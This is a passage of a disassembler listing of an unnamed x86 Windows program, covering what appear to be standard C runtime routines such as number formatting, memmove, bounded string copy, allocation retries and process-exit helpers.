		test	cl, 40h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407693
		movsx	eax, word ptr [edi-4]
		jmp	short loc_407697
; ---------------------------------------------------------------------------

loc_407693:				; CODE XREF: sub_406F97+6F4j
		movzx	eax, word ptr [edi-4]

loc_407697:				; CODE XREF: sub_406F97+6FAj
		cdq
		jmp	short loc_4076AA
; ---------------------------------------------------------------------------

loc_40769A:				; CODE XREF: sub_406F97+6ECj
		test	cl, 40h
		mov	eax, [edi-4]
		jz	short loc_4076A5
		cdq
		jmp	short loc_4076A7
; ---------------------------------------------------------------------------

loc_4076A5:				; CODE XREF: sub_406F97+709j
		xor	edx, edx

loc_4076A7:				; CODE XREF: sub_406F97+5A0j
					; sub_406F97+70Cj
		mov	[ebp+1F8h+var_224], edi

loc_4076AA:				; CODE XREF: sub_406F97+701j
		test	cl, 40h
		jz	short loc_4076C7
		cmp	edx, esi
		jg	short loc_4076C7
		jl	short loc_4076B9
		cmp	eax, esi
		jnb	short loc_4076C7

loc_4076B9:				; CODE XREF: sub_406F97+71Cj
		neg	eax
		adc	edx, 0
		neg	edx
		or	[ebp+1F8h+var_210], 100h

loc_4076C7:				; CODE XREF: sub_406F97+716j
					; sub_406F97+71Aj ...
		test	word ptr [ebp+1F8h+var_210], 9000h
		mov	ebx, edx
		mov	edi, eax
		jnz	short loc_4076D5
		xor	ebx, ebx

loc_4076D5:				; CODE XREF: sub_406F97+73Aj
		cmp	[ebp+1F8h+var_218], 0
		jge	short loc_4076E4
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_4076F5
; ---------------------------------------------------------------------------

loc_4076E4:				; CODE XREF: sub_406F97+742j
		and	[ebp+1F8h+var_210], 0FFFFFFF7h
		mov	eax, 200h
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_4076F5
		mov	[ebp+1F8h+var_218], eax

loc_4076F5:				; CODE XREF: sub_406F97+74Bj
					; sub_406F97+759j
		mov	eax, edi
		or	eax, ebx
		jnz	short loc_4076FF
		and	[ebp+1F8h+var_234], 0

loc_4076FF:				; CODE XREF: sub_406F97+762j
		lea	esi, [ebp+1F8h+var_D]

loc_407705:				; CODE XREF: sub_406F97+7A0j
		mov	eax, [ebp+1F8h+var_218]
		dec	[ebp+1F8h+var_218]
		test	eax, eax
		jg	short loc_407715
		mov	eax, edi
		or	eax, ebx
		jz	short loc_407739

loc_407715:				; CODE XREF: sub_406F97+776j
		mov	eax, [ebp+1F8h+var_220]
		cdq
		push	edx
		push	eax
		push	ebx
		push	edi
		call	sub_40DD10
		add	ecx, 30h
		cmp	ecx, 39h
		mov	[ebp+1F8h+var_260], ebx
		mov	edi, eax
		mov	ebx, edx
		jle	short loc_407734
		add	ecx, [ebp+1F8h+var_244]

loc_407734:				; CODE XREF: sub_406F97+798j
		mov	[esi], cl
		dec	esi
		jmp	short loc_407705
; ---------------------------------------------------------------------------

loc_407739:				; CODE XREF: sub_406F97+77Cj
		lea	eax, [ebp+1F8h+var_D]
		sub	eax, esi
		inc	esi
		test	word ptr [ebp+1F8h+var_210], 200h
		mov	[ebp+1F8h+var_220], eax
		mov	[ebp+1F8h+var_21C], esi
		jz	short loc_40779C
		test	eax, eax
		jz	short loc_40775B
		mov	ecx, esi
		cmp	byte ptr [ecx],	30h
		jz	short loc_40779C

loc_40775B:				; CODE XREF: sub_406F97+7BBj
		dec	[ebp+1F8h+var_21C]
		mov	ecx, [ebp+1F8h+var_21C]
		mov	byte ptr [ecx],	30h
		inc	eax
		jmp	short loc_407799
; ---------------------------------------------------------------------------

loc_407767:				; CODE XREF: sub_406F97+7DAj
		dec	ecx
		cmp	[eax], si
		jz	short loc_407773
		inc	eax
		inc	eax

loc_40776F:				; CODE XREF: sub_406F97+445j
		cmp	ecx, esi
		jnz	short loc_407767

loc_407773:				; CODE XREF: sub_406F97+7D4j
		sub	eax, [ebp+1F8h+var_21C]
		sar	eax, 1
		jmp	short loc_407799
; ---------------------------------------------------------------------------

loc_40777A:				; CODE XREF: sub_406F97+429j
		cmp	edi, esi
		jnz	short loc_407786
		mov	eax, off_424924
		mov	[ebp+1F8h+var_21C], eax

loc_407786:				; CODE XREF: sub_406F97+7E5j
		mov	eax, [ebp+1F8h+var_21C]
		jmp	short loc_407792
; ---------------------------------------------------------------------------

loc_40778B:				; CODE XREF: sub_406F97+7FDj
		dec	ecx
		cmp	byte ptr [eax],	0
		jz	short loc_407796
		inc	eax

loc_407792:				; CODE XREF: sub_406F97+7F2j
		cmp	ecx, esi
		jnz	short loc_40778B

loc_407796:				; CODE XREF: sub_406F97+7F8j
		sub	eax, [ebp+1F8h+var_21C]

loc_407799:				; CODE XREF: sub_406F97+4E1j
					; sub_406F97+4E9j ...
		mov	[ebp+1F8h+var_220], eax

loc_40779C:				; CODE XREF: sub_406F97+3B0j
					; sub_406F97+461j ...
		cmp	[ebp+1F8h+var_248], 0
		jnz	loc_4078A1
		mov	eax, [ebp+1F8h+var_210]
		test	al, 40h
		jz	short loc_4077D2
		test	ax, 100h
		jz	short loc_4077B9
		mov	[ebp+1F8h+var_230], 2Dh
		jmp	short loc_4077CB
; ---------------------------------------------------------------------------

loc_4077B9:				; CODE XREF: sub_406F97+81Aj
		test	al, 1
		jz	short loc_4077C3
		mov	[ebp+1F8h+var_230], 2Bh
		jmp	short loc_4077CB
; ---------------------------------------------------------------------------

loc_4077C3:				; CODE XREF: sub_406F97+824j
		test	al, 2
		jz	short loc_4077D2
		mov	[ebp+1F8h+var_230], 20h

loc_4077CB:				; CODE XREF: sub_406F97+820j
					; sub_406F97+82Aj
		mov	[ebp+1F8h+var_234], 1

loc_4077D2:				; CODE XREF: sub_406F97+814j
					; sub_406F97+82Ej
		mov	ebx, [ebp+1F8h+var_238]
		sub	ebx, [ebp+1F8h+var_220]
		sub	ebx, [ebp+1F8h+var_234]
		test	byte ptr [ebp+1F8h+var_210], 0Ch
		jnz	short loc_4077F2
		push	[ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		push	ebx
		push	20h
		call	sub_406F29
		add	esp, 0Ch

loc_4077F2:				; CODE XREF: sub_406F97+848j
		push	[ebp+1F8h+var_234]
		mov	edi, [ebp+1F8h+var_228]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_230]
		call	sub_406F4D
		test	byte ptr [ebp+1F8h+var_210], 8
		pop	ecx
		jz	short loc_40781F
		test	byte ptr [ebp+1F8h+var_210], 4
		jnz	short loc_40781F
		push	edi
		push	ebx
		push	30h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F29
		add	esp, 0Ch

loc_40781F:				; CODE XREF: sub_406F97+871j
					; sub_406F97+877j
		cmp	[ebp+1F8h+var_23C], 0
		mov	eax, [ebp+1F8h+var_220]
		jz	short loc_407879
		test	eax, eax
		jle	short loc_407879
		mov	esi, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_260], eax

loc_407832:				; CODE XREF: sub_406F97+8D8j
		movzx	eax, word ptr [esi]
		dec	[ebp+1F8h+var_260]
		push	eax
		push	6
		lea	eax, [ebp+1F8h+var_C]
		push	eax
		lea	eax, [ebp+1F8h+var_268]
		inc	esi
		push	eax
		inc	esi
		call	sub_40DCF2
		add	esp, 10h
		test	eax, eax
		jnz	short loc_407873
		cmp	[ebp+1F8h+var_268], eax
		jz	short loc_407873
		push	[ebp+1F8h+var_268]
		lea	eax, [ebp+1F8h+var_22C]
		lea	ecx, [ebp+1F8h+var_C]
		call	sub_406F4D
		cmp	[ebp+1F8h+var_260], 0
		pop	ecx
		jnz	short loc_407832
		jmp	short loc_407886
; ---------------------------------------------------------------------------

loc_407873:				; CODE XREF: sub_406F97+8BBj
					; sub_406F97+8C0j
		or	[ebp+1F8h+var_22C], 0FFFFFFFFh
		jmp	short loc_407886
; ---------------------------------------------------------------------------

loc_407879:				; CODE XREF: sub_406F97+88Fj
					; sub_406F97+893j
		mov	ecx, [ebp+1F8h+var_21C]
		push	eax
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F4D
		pop	ecx

loc_407886:				; CODE XREF: sub_406F97+8DAj
					; sub_406F97+8E0j
		cmp	[ebp+1F8h+var_22C], 0
		jl	short loc_4078A1
		test	byte ptr [ebp+1F8h+var_210], 4
		jz	short loc_4078A1
		push	edi
		push	ebx
		push	20h
		lea	eax, [ebp+1F8h+var_22C]
		call	sub_406F29
		add	esp, 0Ch

loc_4078A1:				; CODE XREF: sub_406F97+57Cj
					; sub_406F97+809j ...
		cmp	[ebp+1F8h+var_24C], 0
		jz	short loc_4078B4 ; default
		push	[ebp+1F8h+var_24C]
		call	sub_403B91
		and	[ebp+1F8h+var_24C], 0
		pop	ecx

loc_4078B4:				; CODE XREF: sub_406F97+19Cj
					; sub_406F97+1BFj ...
		mov	ebx, [ebp+1F8h+var_240]	; default
		mov	al, [ebx]
		test	al, al
		mov	[ebp+1F8h+var_211], al
		jz	short loc_4078E4
		mov	ecx, [ebp+1F8h+var_26C]
		mov	edi, [ebp+1F8h+var_224]
		mov	dl, al
		jmp	loc_4070F5
; ---------------------------------------------------------------------------

loc_4078CD:				; CODE XREF: sub_406F97+36Ej
					; sub_406F97+55Bj
		call	sub_405D93
		mov	dword ptr [eax], 16h
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		jmp	loc_407007
; ---------------------------------------------------------------------------

loc_4078E4:				; CODE XREF: sub_406F97+158j
					; sub_406F97+166j ...
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_4078F1
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4078F1:				; CODE XREF: sub_406F97+951j
		mov	eax, [ebp+1F8h+var_22C]

loc_4078F4:				; CODE XREF: sub_406F97+88j
		mov	ecx, [ebp+1F8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 1F8h
		leave
		retn
sub_406F97	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_40790F	dd offset loc_4072D9	; DATA XREF: sub_406F97+1A2r
		dd offset loc_407140	; jump table for switch	statement
		dd offset loc_40715B
		dd offset loc_4071AA
		dd offset loc_4071E4
		dd offset loc_4071EC
		dd offset loc_407223
		dd offset loc_40731B
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407930	proc near		; CODE XREF: sub_40312E+4Dp
					; sub_406110+2DAp ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_407950
		cmp	edi, eax
		jb	loc_407AF4

loc_407950:				; CODE XREF: sub_407930+16j
		cmp	ecx, 100h
		jb	short loc_407977
		cmp	dword_437E9C, 0
		jz	short loc_407977
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_407977
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DE2C
; ---------------------------------------------------------------------------

loc_407977:				; CODE XREF: sub_407930+26j
					; sub_407930+2Fj ...
		test	edi, 3
		jnz	short loc_407994
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407994:				; CODE XREF: sub_407930+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_4079AC
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_4079B4+4[eax*4]
; ---------------------------------------------------------------------------

loc_4079AC:				; CODE XREF: sub_407930+6Ej
		jmp	dword ptr ds:loc_407AB4[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4079B4:				; CODE XREF: sub_407930+58j
					; sub_407930+B6j ...
		jmp	ds:off_407A38[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_4079C8
		dd offset loc_4079F4
		dd offset loc_407A18
; ---------------------------------------------------------------------------

loc_4079C8:				; DATA XREF: sub_407930+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4079F4:				; DATA XREF: sub_407930+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407A18:				; DATA XREF: sub_407930+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_4079B4
		rep movsd
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407A38	dd offset loc_407A9B	; DATA XREF: sub_407930:loc_4079B4r
		dd offset loc_407A88
		dd offset loc_407A80
		dd offset loc_407A78
		dd offset loc_407A70
		dd offset loc_407A68
		dd offset loc_407A60
		dd offset loc_407A58
; ---------------------------------------------------------------------------

loc_407A58:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_407A60:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_407A68:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_407A70:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_407A78:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_407A80:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_407A88:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_407A9B:				; CODE XREF: sub_407930:loc_4079B4j
					; DATA XREF: sub_407930:off_407A38o
		jmp	ds:off_407AA4[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_407AA4	dd offset loc_407AB4	; DATA XREF: sub_407930+5Cr
					; sub_407930+BAr ...
		dd offset loc_407ABC
		dd offset loc_407AC8
		dd offset loc_407ADC
; ---------------------------------------------------------------------------

loc_407AB4:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407ABC:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407AC8:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407ADC:				; CODE XREF: sub_407930+5Cj
					; sub_407930+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407AF4:				; CODE XREF: sub_407930+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_407B28
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B1C:				; CODE XREF: sub_407930+1DDj
					; sub_407930+238j ...
		neg	ecx
		jmp	ds:off_407BF0[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B28:				; CODE XREF: sub_407930+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_407B40
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_407B40+4[eax*4]
; ---------------------------------------------------------------------------

loc_407B40:				; CODE XREF: sub_407930+202j
					; DATA XREF: sub_407930+209r
		jmp	ds:off_407C40[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_407B54
		dd offset loc_407B78
		dd offset loc_407BA0
; ---------------------------------------------------------------------------

loc_407B54:				; DATA XREF: sub_407930+218o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_407B78:				; DATA XREF: sub_407930+21Co
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		sub	esi, 2
		sub	edi, 2
		cmp	ecx, 8
		jb	short loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 10h

loc_407BA0:				; DATA XREF: sub_407930+220o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_407B1C
		std
		rep movsd
		cld
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_407BF4
		dd offset loc_407BFC
		dd offset loc_407C04
		dd offset loc_407C0C
		dd offset loc_407C14
		dd offset loc_407C1C
		dd offset loc_407C24
off_407BF0	dd offset loc_407C37	; DATA XREF: sub_407930+1EEr
; ---------------------------------------------------------------------------

loc_407BF4:				; DATA XREF: sub_407930+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_407BFC:				; DATA XREF: sub_407930+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_407C04:				; DATA XREF: sub_407930+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_407C0C:				; DATA XREF: sub_407930+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_407C14:				; DATA XREF: sub_407930+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_407C1C:				; DATA XREF: sub_407930+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_407C24:				; DATA XREF: sub_407930+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_407C37:				; CODE XREF: sub_407930+1EEj
					; DATA XREF: sub_407930:off_407BF0o
		jmp	ds:off_407C40[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_407C40	dd offset loc_407C50	; DATA XREF: sub_407930+1E3r
					; sub_407930:loc_407B40r ...
		dd offset loc_407C58
		dd offset loc_407C68
		dd offset loc_407C7C
; ---------------------------------------------------------------------------

loc_407C50:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C58:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C68:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_407C7C:				; CODE XREF: sub_407930+1E3j
					; sub_407930:loc_407B40j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_407930	endp


; =============== S U B	R O U T	I N E =======================================



sub_407C95	proc near		; CODE XREF: sub_40319A+31p
					; sub_403200+3Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jz	short loc_407CAA
		mov	edi, [esp+0Ch+arg_4]
		cmp	edi, ebx
		ja	short loc_407CC5

loc_407CAA:				; CODE XREF: sub_407C95+Bj
					; sub_407C95+3Aj
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_407CB4:				; CODE XREF: sub_407C95+5Dj
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_407CF6
; ---------------------------------------------------------------------------

loc_407CC5:				; CODE XREF: sub_407C95+13j
		mov	esi, [esp+0Ch+arg_8]
		cmp	esi, ebx
		jnz	short loc_407CD1
		mov	[ecx], bl
		jmp	short loc_407CAA
; ---------------------------------------------------------------------------

loc_407CD1:				; CODE XREF: sub_407C95+36j
		mov	edx, ecx

loc_407CD3:				; CODE XREF: sub_407C95+49j
		mov	al, [esi]
		mov	[edx], al
		inc	edx
		inc	esi
		cmp	al, bl
		jz	short loc_407CE0
		dec	edi
		jnz	short loc_407CD3

loc_407CE0:				; CODE XREF: sub_407C95+46j
		cmp	edi, ebx
		jnz	short loc_407CF4
		mov	[ecx], bl
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_407CB4
; ---------------------------------------------------------------------------

loc_407CF4:				; CODE XREF: sub_407C95+4Dj
		xor	eax, eax

loc_407CF6:				; CODE XREF: sub_407C95+2Ej
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_407C95	endp


; =============== S U B	R O U T	I N E =======================================



sub_407CFA	proc near		; CODE XREF: sub_405229+3Bp
					; sub_405EF4+48p ...

arg_0		= dword	ptr  4

		push	esi
		push	edi
		xor	esi, esi

loc_407CFE:				; CODE XREF: sub_407CFA+39j
		push	[esp+8+arg_0]
		call	sub_403C6E
		mov	edi, eax
		test	edi, edi
		pop	ecx
		jnz	short loc_407D35
		cmp	dword_428A90, eax
		jbe	short loc_407D35
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_428A90
		jbe	short loc_407D2E
		or	eax, 0FFFFFFFFh

loc_407D2E:				; CODE XREF: sub_407CFA+2Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407CFE

loc_407D35:				; CODE XREF: sub_407CFA+12j
					; sub_407CFA+1Aj
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407CFA	endp


; =============== S U B	R O U T	I N E =======================================



sub_407D3A	proc near		; CODE XREF: sub_403344+5p
					; sub_4058DA+30p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407D3E:				; CODE XREF: sub_407D3A+41j
		push	0
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40DF0F
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407D7D
		cmp	dword_428A90, eax
		jbe	short loc_407D7D
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_428A90
		jbe	short loc_407D76
		or	eax, 0FFFFFFFFh

loc_407D76:				; CODE XREF: sub_407D3A+37j
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407D3E

loc_407D7D:				; CODE XREF: sub_407D3A+1Aj
					; sub_407D3A+22j
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407D3A	endp


; =============== S U B	R O U T	I N E =======================================



sub_407D82	proc near		; CODE XREF: sub_403297+58p
					; sub_403297+6Fp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		push	edi
		xor	esi, esi

loc_407D86:				; CODE XREF: sub_407D82+44j
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40E02D
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_407DC8
		cmp	[esp+8+arg_4], eax
		jz	short loc_407DC8
		cmp	dword_428A90, eax
		jbe	short loc_407DC8
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_428A90
		jbe	short loc_407DC1
		or	eax, 0FFFFFFFFh

loc_407DC1:				; CODE XREF: sub_407D82+3Aj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407D86

loc_407DC8:				; CODE XREF: sub_407D82+17j
					; sub_407D82+1Dj ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407D82	endp


; =============== S U B	R O U T	I N E =======================================



sub_407DCD	proc near		; CODE XREF: sub_409398+40p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		push	edi
		xor	esi, esi

loc_407DD1:				; CODE XREF: sub_407DCD+49j
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_40E248
		mov	edi, eax
		add	esp, 0Ch
		test	edi, edi
		jnz	short loc_407E18
		cmp	[esp+8+arg_8], eax
		jz	short loc_407E18
		cmp	dword_428A90, eax
		jbe	short loc_407E18
		push	esi
		call	ds:off_41E0F8
		lea	eax, [esi+3E8h]
		cmp	eax, dword_428A90
		jbe	short loc_407E11
		or	eax, 0FFFFFFFFh

loc_407E11:				; CODE XREF: sub_407DCD+3Fj
		cmp	eax, 0FFFFFFFFh
		mov	esi, eax
		jnz	short loc_407DD1

loc_407E18:				; CODE XREF: sub_407DCD+1Cj
					; sub_407DCD+22j ...
		mov	eax, edi
		pop	edi
		pop	esi
		retn
sub_407DCD	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E1D	proc near		; CODE XREF: .text:00404609p
					; .text:0040462Fp ...

arg_0		= dword	ptr  4

		call	sub_40A214
		push	[esp+arg_0]
		call	sub_40A074
		push	off_424930
		call	sub_405753
		push	0FFh
		call	eax
		add	esp, 0Ch
		retn
sub_407E1D	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E41	proc near		; CODE XREF: sub_407E67+4p

arg_0		= dword	ptr  4

		push	offset aMscoree_dll ; "mscoree.dll"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short locret_407E66
		push	offset aCorexitprocess ; "CorExitProcess"
		push	eax
		call	ds:off_41E0E8
		test	eax, eax
		jz	short locret_407E66
		push	[esp+arg_0]
		call	eax

locret_407E66:				; CODE XREF: sub_407E41+Dj
					; sub_407E41+1Dj
		retn
sub_407E41	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E67	proc near		; CODE XREF: sub_403C6E+34p
					; sub_40449D+1Cp ...

arg_0		= dword	ptr  4

		push	[esp+arg_0]
		call	sub_407E41
		pop	ecx
		push	[esp+arg_0]
		call	ds:off_41E050
		int	3		; Trap to Debugger
sub_407E67	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_407E7C	proc near		; CODE XREF: sub_403373+Cp
		push	8
		call	sub_405FB7
		pop	ecx
		retn
sub_407E7C	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E85	proc near		; CODE XREF: sub_4033A9p
		push	8
		call	sub_405EDF
		pop	ecx
		retn
sub_407E85	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E8E	proc near		; CODE XREF: sub_407FCB+78p
					; sub_407FCB+88p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, eax
		jmp	short loc_407E9E
; ---------------------------------------------------------------------------

loc_407E93:				; CODE XREF: sub_407E8E+14j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407E9B
		call	eax

loc_407E9B:				; CODE XREF: sub_407E8E+9j
		add	esi, 4

loc_407E9E:				; CODE XREF: sub_407E8E+3j
		cmp	esi, [esp+4+arg_0]
		jb	short loc_407E93
		pop	esi
		retn
sub_407E8E	endp


